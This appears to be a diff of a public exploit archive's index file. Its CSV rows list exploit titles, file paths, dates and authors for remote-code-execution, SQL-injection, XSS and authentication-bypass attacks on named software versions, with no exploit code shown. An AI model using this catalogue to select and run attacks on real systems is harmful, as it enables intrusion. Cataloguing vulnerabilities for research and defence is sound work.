 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@@ -18134,7 +18145,6 @@ id,file,description,date,author,type,platform,port
 46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
-46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
 46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
@@ -18291,6 +18301,10 @@ id,file,description,date,author,type,platform,port
 48651,exploits/multiple/remote/48651.txt,"Qmail SMTP 1.03 - Bash Environment Variable Injection",2020-07-08,1F98D,remote,multiple,
 48657,exploits/windows/remote/48657.py,"CompleteFTP Professional 12.1.3 - Remote Code Execution",2020-07-09,1F98D,remote,windows,
 48661,exploits/linux/remote/48661.sh,"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution",2020-07-10,SpicyItalian,remote,linux,
+49067,exploits/multiple/remote/49067.py,"Aerospike Database 5.1.0.3 - OS Command Execution",2020-11-17,"Matt S",remote,multiple,
+49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
+49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
+49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38107,8 +38121,8 @@ id,file,description,date,author,type,platform,port
 37767,exploits/multiple/webapps/37767.txt,"Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",webapps,multiple,
 37769,exploits/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",webapps,php,
 37770,exploits/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution",2015-08-15,MadMouse,webapps,hardware,
-37773,exploits/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",webapps,php,
-37774,exploits/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",webapps,php,
+37773,exploits/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,Omar,webapps,php,
+37774,exploits/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,Omar,webapps,php,
 37778,exploits/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",webapps,hardware,
 37779,exploits/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",webapps,php,
 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,
@@ -40861,6 +40875,16 @@ id,file,description,date,author,type,platform,port
 49040,exploits/multiple/webapps/49040.txt,"Touchbase.io 1.10 - Stored Cross Site Scripting",2020-11-13,"Simran Sankhala",webapps,multiple,
 49044,exploits/php/webapps/49044.txt,"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure",2020-11-13,"Jinson Varghese Behanan",webapps,php,
 49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,
+49046,exploits/php/webapps/49046.txt,"Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)",2020-11-16,"Matthew Aberegg",webapps,php,
+49048,exploits/php/webapps/49048.txt,"Water Billing System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
+49059,exploits/php/webapps/49059.txt,"Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection",2020-11-17,"Ramil Mustafayev",webapps,php,
+49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,
+49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,
+49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
+49056,exploits/php/webapps/49056.txt,"Car Rental Management System 1.0 - 'car_id' Sql Injection",2020-11-16,"Mehmet Kelepçe",webapps,php,
+49058,exploits/php/webapps/49058.txt,"EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass",2020-11-17,"Kislay Kumar",webapps,php,
+49060,exploits/php/webapps/49060.txt,"SugarCRM 6.5.18 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
+49061,exploits/php/webapps/49061.txt,"WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
@@ -43278,3 +43302,17 @@ id,file,description,date,author,type,platform,port
 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,
 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,
+49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,
+49069,exploits/php/webapps/49069.txt,"Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)",2020-11-18,ZwX,webapps,php,
+49070,exploits/multiple/webapps/49070.txt,"BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery",2020-11-18,"RedTeam Pentesting GmbH",webapps,multiple,
+49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,
+49074,exploits/hardware/webapps/49074.py,"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification",2020-11-19,"Ricardo Longatto",webapps,hardware,
+49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,
+49076,exploits/ruby/webapps/49076.py,"Gitlab 12.9.0 - Arbitrary File Read (Authenticated)",2020-11-19,"Jasper Rasenberg",webapps,ruby,
+49077,exploits/multiple/webapps/49077.txt,"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution",2020-11-19,"Darren King",webapps,multiple,
+49078,exploits/multiple/webapps/49078.txt,"TestBox CFML Test Framework 4.1.0 - Directory Traversal",2020-11-19,"Darren King",webapps,multiple,
+49079,exploits/cgi/webapps/49079.py,"Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection",2020-11-19,"Gabriele Zuddas",webapps,cgi,
+49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,
+49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,
+49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,
+49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,